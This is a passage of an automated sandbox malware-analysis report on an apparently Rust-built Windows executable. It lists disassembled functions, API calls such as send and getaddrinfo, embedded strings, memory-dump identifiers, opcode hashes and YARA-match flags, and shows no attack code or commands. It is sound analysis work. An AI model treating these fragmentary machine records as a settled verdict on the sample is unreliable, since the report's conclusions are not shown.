                • Instruction Fuzzy Hash: 1A71B332A08F5698FB16AF61E8403FCA760AB457A4FC48073DE5D07795EE3CA659C320

                Control-flow Graph

                APIs
                Strings
                • HTTP/2 connection in progressALPN upgraded to HTTP/2/home/airevan/.cargo/registry/src/mirrors.ustc.edu.cn-4affec411d11e50f/hyper-0.14.28/src/client/client.rs, xrefs: 00007FF71A7F0A4E
                • internal error: entered unreachable codemid > len, xrefs: 00007FF71A7F0C2D
                Memory Dump Source
                • Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true
                • Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd
                Similarity
                • API ID: memcpy
                • String ID: HTTP/2 connection in progressALPN upgraded to HTTP/2/home/airevan/.cargo/registry/src/mirrors.ustc.edu.cn-4affec411d11e50f/hyper-0.14.28/src/client/client.rs$internal error: entered unreachable codemid > len
                • API String ID: 3510742995-2032269332
                • Opcode ID: fb3fa56834ef181a19cf2ae2052b1795dc664fa910a9a5653948d8e44a1cdb5a
                • Instruction ID: 26b2c9fe4aab291ba85aa607d56f350d3a724c39140e18cd6f3cea767866b16e
                • Opcode Fuzzy Hash: fb3fa56834ef181a19cf2ae2052b1795dc664fa910a9a5653948d8e44a1cdb5a
                • Instruction Fuzzy Hash: D0619326609F9680EA21EB11E4503E9A764F7897A0F818173DEAD03795EE38D28EC710

                Control-flow Graph

                APIs
                Strings
                • assertion failed: len >= mem::size_of::<c::sockaddr_in6>(), xrefs: 00007FF71A7CD69A
                • assertion failed: len >= mem::size_of::<c::sockaddr_in>()std\src\sys_common\net.rs, xrefs: 00007FF71A7CD682
                Memory Dump Source
                • Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true
                • Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd
                Similarity
                • API ID: ErrorLast$getsockname
                • String ID: assertion failed: len >= mem::size_of::<c::sockaddr_in6>()$assertion failed: len >= mem::size_of::<c::sockaddr_in>()std\src\sys_common\net.rs
                • API String ID: 3066790409-3544120690
                • Opcode ID: 931f7c25665ca8fdeda858951bf81e5e8164233e45e3a5e9562f8f8a3ab71c3b
                • Instruction ID: d06c407c0baaba716e7d22398a56fc3357700b9a77585aab58314b3a8f7c42bc
                • Opcode Fuzzy Hash: 931f7c25665ca8fdeda858951bf81e5e8164233e45e3a5e9562f8f8a3ab71c3b
                • Instruction Fuzzy Hash: 8EA1402291CAC195F7259F18E0413FAF3B0EF95364F509126EBC842A56EB3DE299CB50

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 7283 7ff71a7dd8e0-7ff71a7dd905 7284 7ff71a7dd923-7ff71a7dd9a9 call 7ff71a7dd607 7283->7284 7285 7ff71a7dd907-7ff71a7dd90a 7283->7285 7292 7ff71a7dd9d2-7ff71a7dda4b call 7ff71a7dd62c call 7ff71a7dd683 7284->7292 7293 7ff71a7dd9ab-7ff71a7dd9c4 call 7ff71a7cd321 7284->7293 7286 7ff71a7ddc63-7ff71a7ddc6f call 7ff71a7b1d80 7285->7286 7287 7ff71a7dd910-7ff71a7dd91e 7285->7287 7289 7ff71a7dda52-7ff71a7dda60 7287->7289 7343 7ff71a7dda63 call 7ff71a7e17e5 7289->7343 7344 7ff71a7dda63 call 7ff71a7e1777 7289->7344 7345 7ff71a7dda63 call 7ff71a7e1789 7289->7345 7292->7289 7293->7292 7305 7ff71a7dd9c6-7ff71a7dd9ce call 7ff71a7e1037 7293->7305 7296 7ff71a7dda66-7ff71a7dda6d 7299 7ff71a7dda6f-7ff71a7dda76 7296->7299 7300 7ff71a7dda7b-7ff71a7ddab5 memcpy call 7ff71a7e279c 7296->7300 7303 7ff71a7ddc49-7ff71a7ddc62 7299->7303 7309 7ff71a7ddabf-7ff71a7ddaea memcpy 7300->7309 7310 7ff71a7ddab7-7ff71a7ddaba 7300->7310 7305->7292 7313 7ff71a7ddb26-7ff71a7ddb45 memcpy 7309->7313 7314 7ff71a7ddaec-7ff71a7ddb21 call 7ff71a7d542d memcpy 7309->7314 7312 7ff71a7ddbfc-7ff71a7ddc47 call 7ff71a7dce80 call 7ff71a7da70d call 7ff71a7da6ef call 7ff71a7da72f call 7ff71a7da73e 7310->7312 7312->7303 7315 7ff71a7ddb94-7ff71a7ddbf0 memcpy call 7ff71a7d542d memcpy 7313->7315 7316 7ff71a7ddb47-7ff71a7ddb59 call 7ff71a84eabb 7313->7316 7314->7312 7315->7312 7328 7ff71a7ddbf2-7ff71a7ddbf7 call 7ff71a7dce9e 7315->7328 7316->7315 7326 7ff71a7ddb5b-7ff71a7ddb7f call 7ff71a7c784e call 7ff71a7dd278 7316->7326 7326->7310 7338 7ff71a7ddb85-7ff71a7ddb8f call 7ff71a7dce9e 7326->7338 7328->7312 7338->7310 7343->7296 7344->7296 7345->7296
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true
                • Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd
                Similarity
                • API ID: memcpy
                • String ID:
                • API String ID: 3510742995-0
                • Opcode ID: bf815bb016e7edd8c4b198eff62ae9bf9d8e0234e6e74313954c3bca267dcb59
                • Instruction ID: 31180e3317d9ec55a0f45c1eaf591f66ae3c04bf8ad20bd8b7edc346533c2e19
                • Opcode Fuzzy Hash: bf815bb016e7edd8c4b198eff62ae9bf9d8e0234e6e74313954c3bca267dcb59
                • Instruction Fuzzy Hash: 41917122A08FC180FB51EF2194543FDA760FB99B94F844176DE8D1B68ADF68D65DC320
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2905472003.000001912B770000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001912B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1912b770000_31#U544a.jbxd
                Yara matches
                Similarity
                • API ID: IoctlSocketclosesocket
                • String ID: _Cy
                • API String ID: 3445158922-1085951347
                • Opcode ID: 3b002878a253f710bfbcdeef10aed79583f0fb1cb8ac18c2645925e9684d3859
                • Instruction ID: 5c255282bffe8ad2f435670dd74cb676296e9681e2eba16e5d7f0255bc416a79
                • Opcode Fuzzy Hash: 3b002878a253f710bfbcdeef10aed79583f0fb1cb8ac18c2645925e9684d3859
                • Instruction Fuzzy Hash: 6D31D73065CA894FD7A8EF28C8947AAB7E5FBA9315F210A3EE44AC71D1DB34C5418741
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true
                • Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd
                Similarity
                • API ID: AddressErrorLastWait
                • String ID:
                • API String ID: 1574541344-0
                • Opcode ID: 8d18f15d495c35c1631006888bf8f4057b910bdb21fbbad4ec6a461566f3455c
                • Instruction ID: dbc8450e3de9cc0622909efbc104412bf45b878d46606a1b14974d92c37e7829
                • Opcode Fuzzy Hash: 8d18f15d495c35c1631006888bf8f4057b910bdb21fbbad4ec6a461566f3455c
                • Instruction Fuzzy Hash: CF214E36F08A1286FF27DA6598505BCA361AB41768FA48077EF1F47684CF3CD459C310
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true
                • Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd
                Similarity
                • API ID: memcpy
                • String ID:
                • API String ID: 3510742995-0
                • Opcode ID: 9e6f2ebb7423b2d2f02bb7d28131e52a0ccc3afa1cb0e652559cd1194dc7aec8
                • Instruction ID: 0f6f9aba29cffcc2ab398ebb6671506d610c95c65c1bd23d273fb9c583687b26
                • Opcode Fuzzy Hash: 9e6f2ebb7423b2d2f02bb7d28131e52a0ccc3afa1cb0e652559cd1194dc7aec8
                • Instruction Fuzzy Hash: C2A18522A0CA8285F766AB14E0413FDE361FB887A4F818172DF9D57646DF3CE699C710
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true
                • Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd
                Similarity
                • API ID: memcpy
                • String ID:
                • API String ID: 3510742995-0
                • Opcode ID: abe217286bb2f3fd9939eed656a452b639c50713e582eaf0bea777c56afe38d4
                • Instruction ID: 722086e85a54f09860cf0fa85f179674a2e8b3cd70d61548e338cfdf0ea4ba8a
                • Opcode Fuzzy Hash: abe217286bb2f3fd9939eed656a452b639c50713e582eaf0bea777c56afe38d4
                • Instruction Fuzzy Hash: BE61B626A0CA9185F761EF2091143BEE761EB99BA4F800073EE8D57786EE3CD65DC710
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true
                • Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd
                Similarity
                • API ID: memcpy$AddressErrorLastWait
                • String ID:
                • API String ID: 587126646-0
                • Opcode ID: 7be297f506d7abb346f94603d76872fef7a3ebfb9eb9e20048a287e877087f11
                • Instruction ID: 0ba20c4945131381b7fdba448712cd20fca59a2600a9e6479e51a192370c70bb
                • Opcode Fuzzy Hash: 7be297f506d7abb346f94603d76872fef7a3ebfb9eb9e20048a287e877087f11
                • Instruction Fuzzy Hash: 6281D3A2A08FD585F762EB18D1047EDA7A8FB55758F45A122CF8C13646EF38E2D9C340
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true
                • Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd
                Similarity
                • API ID: ErrorLastgetaddrinfomemcpy
                • String ID:
                • API String ID: 1131991525-0
                • Opcode ID: e2313d2df0e72bc970b087ae715ca3907aef79c85d4955bcf8ae0babd702b484
                • Instruction ID: d44c9731d703c7345052e84e53407ad7cbfcb64f8bf84f10ecb9ebdc04b8131d
                • Opcode Fuzzy Hash: e2313d2df0e72bc970b087ae715ca3907aef79c85d4955bcf8ae0babd702b484
                • Instruction Fuzzy Hash: A251A672A48EC588F7269F71D4043FCA7A1FB557A4F844172DA5D0BB84EF7C99A8C220
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.2905472003.000001912B770000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001912B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1912b770000_31#U544a.jbxd
                Yara matches
                Similarity
                • API ID: EnvironmentStrings_malloc_crtfree
                • String ID:
                • API String ID: 3979818520-0
                • Opcode ID: 7698a9ddcb02a270274e3175e00000504881df1837fc77bbe77ff8e25bd722fe
                • Instruction ID: 8551bd74f8a739971cac2780d819e8857c938c16e2d239244b5a86ef1224887d
                • Opcode Fuzzy Hash: 7698a9ddcb02a270274e3175e00000504881df1837fc77bbe77ff8e25bd722fe
                • Instruction Fuzzy Hash: AD31243055CF198FDB90EF28984526977D0FB5D740F29046EB44AC32E4DB34D88187C2
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.2905472003.000001912B770000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001912B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1912b770000_31#U544a.jbxd
                Yara matches
                Similarity
                • API ID: _snprintf$strchr$_errno_invalid_parameter_noinfo
                • String ID:
                • API String ID: 199363273-0
                • Opcode ID: ef1086764119ff5136789d9d8e2d7752195b0cca866a2fd43ceec109b41ef0b4
                • Instruction ID: 96af11b593e04bf3c3127ebe667511cc7e5b364fdf2a3a5e951814562c7b7e1d
                • Opcode Fuzzy Hash: ef1086764119ff5136789d9d8e2d7752195b0cca866a2fd43ceec109b41ef0b4
                • Instruction Fuzzy Hash: 2CD19570658A099FE758FF28D8957EA73E5FB99300F21052DE48AC32D1EA34DD428B81
                APIs
                • SetThreadDescription.KERNELBASE ref: 00007FF71A7A7083
                  • Part of subcall function 00007FF71A8214E0: WaitOnAddress.API-MS-WIN-CORE-SYNCH-L1-2-0 ref: 00007FF71A82155B
                  • Part of subcall function 00007FF71A8214E0: GetLastError.KERNEL32 ref: 00007FF71A821565
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true
                • Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd
                Similarity
                • API ID: AddressDescriptionErrorLastThreadWait
                • String ID: main
                • API String ID: 2915094395-3207122276
                • Opcode ID: 6bf849e50b73a5378e67a2eecaa6d1ca066ab99e967b63fdcae7f8a52360afbb
                • Instruction ID: adcdfc359aefaa8546cb66005db3a7773f2684af4f64779952d1488bfad9462d
                • Opcode Fuzzy Hash: 6bf849e50b73a5378e67a2eecaa6d1ca066ab99e967b63fdcae7f8a52360afbb
                • Instruction Fuzzy Hash: DB112B25E28F4298FB02FBA0D8552F9A374AB44368FC001B3D94D466A5DF7CE12DC320
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true
                • Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd
                Similarity
                • API ID: memcpy
                • String ID: tcp connect error
                • API String ID: 3510742995-3983906501
                • Opcode ID: b346396f517aae219976fea43866e032b4d00a5e0ff1591a30da09625f8d5527
                • Instruction ID: 6ace758f6aa73d70c9660661d528108717ad074246ea73d0179927e4769960ab
                • Opcode Fuzzy Hash: b346396f517aae219976fea43866e032b4d00a5e0ff1591a30da09625f8d5527
                • Instruction Fuzzy Hash: 29915422A0CEC580F671AF2591053F9A760FB99764F845172CE8D27696DF3DE28EC710
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true
                • Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd
                Similarity
                • API ID: ErrorGuaranteeLastStackThread
                • String ID:
                • API String ID: 2304615615-0
                • Opcode ID: 2a504a5b04ff23725d9f355e9442800cb31edef5f6160df3ba04c1c4a7d64c9f
                • Instruction ID: 3fce354f5848346dbe72606920959f9fd8d1b7ccd5a7c1a3d872320bd5cfd73b
                • Opcode Fuzzy Hash: 2a504a5b04ff23725d9f355e9442800cb31edef5f6160df3ba04c1c4a7d64c9f
                • Instruction Fuzzy Hash: 9D41F662B09A4545FB05FF22E4493BDD750AF49BE4F888072DE4D0BB86CE3CD55A8360
                APIs
                • send.WS2_32 ref: 00007FF71A84EDFF
                • WSAGetLastError.WS2_32(?,?,?,0000000D00000003,-7FFFFFFFFFFFFF40,-8000000000000000,?,00000000,?,?,00007FF71A7DFC96,?,00000000,?,?,00007FF71A7DF121), ref: 00007FF71A84EE14
                Memory Dump Source
                • Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true
                • Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd
                Similarity
                • API ID: ErrorLastsend
                • String ID:
                • API String ID: 1802528911-0
                • Opcode ID: 72cd2e1fdbdcc033eee39d19f21ed1817fcae169fff91bb8c9ad2bd43ceefb86
                • Instruction ID: 206867f3f4b451ca69b88bb89efc62620cb29ce3773cb1ad2bc5dc1a0edd5d41
                • Opcode Fuzzy Hash: 72cd2e1fdbdcc033eee39d19f21ed1817fcae169fff91bb8c9ad2bd43ceefb86
                • Instruction Fuzzy Hash: 1F31497260CA8188FB22BA1698006FAE721EF957B4F840173EE5D077D5CE3CD45A8310
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true
                • Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd
                Similarity
                • API ID: Thread$CurrentDescription
                • String ID:
                • API String ID: 654298328-0
                • Opcode ID: 958b72673ed78492c1e24539d98b98fd5fecfed94edf36c7bd84f68b68f19a89
                • Instruction ID: f4ae0ea19ec9393fab4550bf4faac6c0480616c40f9e9f4d1ec9829750d65156
                • Opcode Fuzzy Hash: 958b72673ed78492c1e24539d98b98fd5fecfed94edf36c7bd84f68b68f19a89
                • Instruction Fuzzy Hash: CC11AE76B19E5588FB06FB62D5183BC9761AB44FE4F844473CE0E17B84DE38D99A8320
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true
                • Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd
                Similarity
                • API ID: memcpy
                • String ID: main
                • API String ID: 3510742995-3207122276
                • Opcode ID: 0f17e29a02de98d152f66a33a9046dcbe47faad29edbef151854e86070552423
                • Instruction ID: 7424a702191e6ef801f52abd7e0bb80535d1fba76890d52ee2b9ef0506ee4d8b
                • Opcode Fuzzy Hash: 0f17e29a02de98d152f66a33a9046dcbe47faad29edbef151854e86070552423
                • Instruction Fuzzy Hash: D4119432A14E1282FB22FB21F5513BDA360EB947A4F944472DA4E03B92DF3CE469C350
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true
                • Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd
                Similarity
                • API ID: AddressWakeclosesocket
                • String ID:
                • API String ID: 947748948-0
                • Opcode ID: d8bc03e7968afdc8b3038f96d98704458aa201a36f99fa33856e09b0841493ef
                • Instruction ID: 5384ac3ca9dde550d7bd64c7bec67c9766c6896bddbd87222ddd93e923bd9865
                • Opcode Fuzzy Hash: d8bc03e7968afdc8b3038f96d98704458aa201a36f99fa33856e09b0841493ef
                • Instruction Fuzzy Hash: 19F0E933F146224FFB17DBB8A8506AD23A0A78179DB448036CF4A5B644DF389496C750
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true
                • Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd
                Similarity
                • API ID: AddressWakeclosesocket
                • String ID:
                • API String ID: 947748948-0
                • Opcode ID: a998d827556b4a9a6d1af1ee82fc63cac52b512a03d77c94a7eaa85daf934d21
                • Instruction ID: 0a7fbbda8442719cdaa952e587b98c8812059293fbf541566e833c3511eb4f55
                • Opcode Fuzzy Hash: a998d827556b4a9a6d1af1ee82fc63cac52b512a03d77c94a7eaa85daf934d21
                • Instruction Fuzzy Hash: 3AF08137F24B2189FB02DB74A4503AC6370BB5576CF948132DF4A26A44DF3891D9C310
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true
                • Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd
                Similarity
                • API ID: memcpy
                • String ID:
                • API String ID: 3510742995-0
                • Opcode ID: 4937bb00717c3e19372ba053f2aa0f58b3313000c9793f6f9284184e91c93caa
                • Instruction ID: bbc15690abb2d76730d6912cd732d71d7b0cf339c3ec96cce2e4d3a4bb89ccc4
                • Opcode Fuzzy Hash: 4937bb00717c3e19372ba053f2aa0f58b3313000c9793f6f9284184e91c93caa
                • Instruction Fuzzy Hash: AB519172705F4692EE10AF56E5802ADA360FB58BE0F888832CF9D07791DF3CE5698354
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true
                • Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd
                Similarity
                • API ID: memcpy
                • String ID:
                • API String ID: 3510742995-0
                • Opcode ID: 091ea29b4aef54b842050c19db39b449db1e52e0910c9c49d5d66ea219a1b02e
                • Instruction ID: 129bce68beb2cbff3192d5960905173210d17220655de7720ba63adf4b6d62cd
                • Opcode Fuzzy Hash: 091ea29b4aef54b842050c19db39b449db1e52e0910c9c49d5d66ea219a1b02e
                • Instruction Fuzzy Hash: 7D016172B08A4281FE216E02F5413F9D350AB597E0F888172DE9A06786DE7CD28D8351
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.2905472003.000001912B770000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001912B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1912b770000_31#U544a.jbxd
